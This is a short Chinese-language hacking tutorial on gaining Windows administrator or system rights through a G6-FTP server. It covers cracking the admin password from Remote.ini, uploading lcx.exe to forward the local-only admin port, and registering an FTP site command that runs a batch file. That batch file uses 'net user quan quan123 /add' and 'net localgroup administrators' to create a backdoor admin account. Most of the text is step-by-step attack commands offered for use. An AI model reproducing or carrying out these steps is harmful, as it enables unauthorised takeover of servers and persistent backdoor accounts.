0x00 G6-FTP簡介
-
G6 FTP Server 新一代的 FTP 服務器端軟件,支持 RFC-959 標準並增強其中的某些功能,上傳和下載都可以續傳,實時查看運行狀態,佔用帶寬,還有很多功能。
-
G6-FTP的默認端口爲
8021,只偵聽在127.0.0.1的8021端口上,所以無法從外部直接訪問,需要進行端口轉發(使用lcx 工具(lcx 具有三個功能:監聽、轉發、端口轉向))。
0x01 提取方法
1、通過執行bat文件提權
2、通過映射bat文件提權
0x02 通過執行bat文件提權
步驟如下
1、下載配置文件Remote.ini,將administrator管理密碼解密
用cmd5 破解
2、查找該網站的可讀可寫目錄,然後上傳cmd.exe和lcx.exe到該目錄下
3、利用lcx端口轉發 默認只允許本機連接
lcx.exe -tran 8027 127.0.0.1 8021
4、以管理員用戶登錄服務端
轉發成功後,通過G6-FTP軟件進行連接,以管理員用戶登入
5、創建FTP用戶並進行權限設置
6、上傳批處理文件
adduser.bat中的文件內容爲:即新建一個用戶名爲quan的用戶,並且加入到管理員組中。
net user quan quan123 /add
net localgroup administrators quan /add
7、在G6-FTP軟件中加入批處理命令
site commands-> +
Command:ADDUSER
Excute:
8、普通用戶登錄ftp
9、執行所加入的批處理命令
執行命令quote site adduser.bat
0x03 通過執行bat文件提權
可用性較差
步驟如下
1、以非特權用戶登錄
2、通過添加FTP用戶賬戶hhh
3、對FTP服務器添加新的site命令
4、新建a.bat文件
net user quan quan123 /add
net localgroup administrators quan /add
5、將a.bat文件映射到新建的site命令
6、獲取system權限
以test用戶登錄ftp服務器,執行以下命令
ftp>quote site a
0x04 參考文章
https://www.cnblogs.com/feizianquan/p/10892115.html
《網絡攻防實戰研究——漏洞利用與提權》